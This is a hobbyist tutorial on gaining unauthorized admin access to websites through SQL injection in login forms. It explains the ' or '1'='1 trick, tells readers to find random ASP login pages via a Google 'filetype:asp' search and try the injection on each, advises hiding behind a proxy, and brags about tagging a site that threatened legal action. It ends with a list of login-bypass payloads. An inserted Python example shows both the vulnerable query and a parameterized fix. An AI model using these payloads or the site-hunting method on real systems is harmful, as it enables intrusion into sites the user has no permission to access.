Easy way to gain administrative access on a website
By Citizin
This is a simple tutorial. It will tell you just what to do and how it works. Let's get to reading, eh?
Step 1 – What to do exactly
Let's understand what we're going to do.
You need a line of text/code that is true, and what do I mean by true?
That's true, 1 = 1 is true.
How do we use that to our advantage?
Well, let's see here.
What does a username and password always check for?
Username:Justin
Password:PinkPanther
When you log in, it checks if Justin's password equals PinkPanther. Well,
something is already true in the line 1 = 1, so that's all we really
need. There are lots of other injections you can make, so be creative.
This one might not work on some websites as it does on others; for a list of
other injections, read the bottom of the tutorial.
Now to continue.
The formatting is similar to this:
Quote:
"SELECT * FROM tblUser WHERE UserName = 'user' AND Password = 'pass';"
So when you type ' or '1' = '1 it looks like:
Quote:
"SELECT * FROM tblUser WHERE UserName = '' or '1' = '1' AND Password = '' or '1' = '1';"
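Why that input changes the query, and how a parameterized query stops it, as an added example that is not part of the original tutorial. It assumes Python's sqlite3 standing in for the site's database; the function names and the sample row are constructed for illustration.

```python
import sqlite3

# The always-true input quoted in the tutorial above.
INJECTED = "' or '1' = '1"

def make_db():
    # Constructed sample row; table and column names follow the quoted query.
    # Plain-text passwords only mirror that query; store password hashes instead.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE tblUser (UserName TEXT, Password TEXT)")
    db.execute("INSERT INTO tblUser VALUES ('Justin', 'PinkPanther')")
    return db

def login_concat(db, user, password):
    # Vulnerable pattern: input is pasted into the SQL text, so a quote in
    # the input closes the string literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM tblUser WHERE UserName = '" + user
           + "' AND Password = '" + password + "';")
    return sql, db.execute(sql).fetchall()

def login_param(db, user, password):
    # Fix: placeholders keep the SQL text fixed and pass input as values,
    # so the quote characters are compared as data, never parsed.
    sql = "SELECT * FROM tblUser WHERE UserName = ? AND Password = ?;"
    return db.execute(sql, (user, password)).fetchall()

if __name__ == "__main__":
    db = make_db()
    sql, rows = login_concat(db, INJECTED, INJECTED)
    # AND binds tighter than OR, so the WHERE clause reads
    #   UserName = '' OR ('1' = '1' AND Password = '') OR '1' = '1'
    # and the final OR makes it true for every row in the table.
    print(sql)
    print("concatenated query rows:", len(rows))
    print("parameterized query rows:", len(login_param(db, INJECTED, INJECTED)))
    print("valid login still works:", len(login_param(db, "Justin", "PinkPanther")))
```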
Step 2 – So I understand how it works, how to get logins?
Well, Google is one of the top search engines, but it works as more
than a search engine. Let's take a closer look at how we can find ASP
logins with Google.
1. Go to Google.com
2. Type “login filetype:asp”
3. Click on a link and type in the injection for username and password
4. If successful, you'll have admin cp
5. If not, return to #2 and try a different link
See, now the problem is a lot of these are going to get hit, so I
suggest you start on page 15. A lot may not work, a lot may, so don't
give up cause the first 10 didn't work. I also suggest using a proxy. I
got an email from some website saying that they were going to sue, some
bullshit, but I was under a proxy and I tagged the site with my email,
so that's the only thing they have of mine. Some webmasters may take this
seriously, so be careful.
Other Injections
Here they be:
Code:
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
Other SQL injections thanks to ComSec of GovernmentSecurity.
I hope this all helped you. I suggest reading up on injection to understand it a bit more.
-Citizin
www.gamerzplanet.net